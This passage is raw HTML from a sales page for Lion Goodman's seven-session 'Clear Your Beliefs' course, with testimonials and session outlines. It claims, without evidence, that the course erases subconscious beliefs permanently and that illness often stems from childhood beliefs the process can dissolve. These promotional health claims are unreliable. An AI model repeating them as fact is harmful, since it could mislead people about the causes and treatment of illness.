flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work 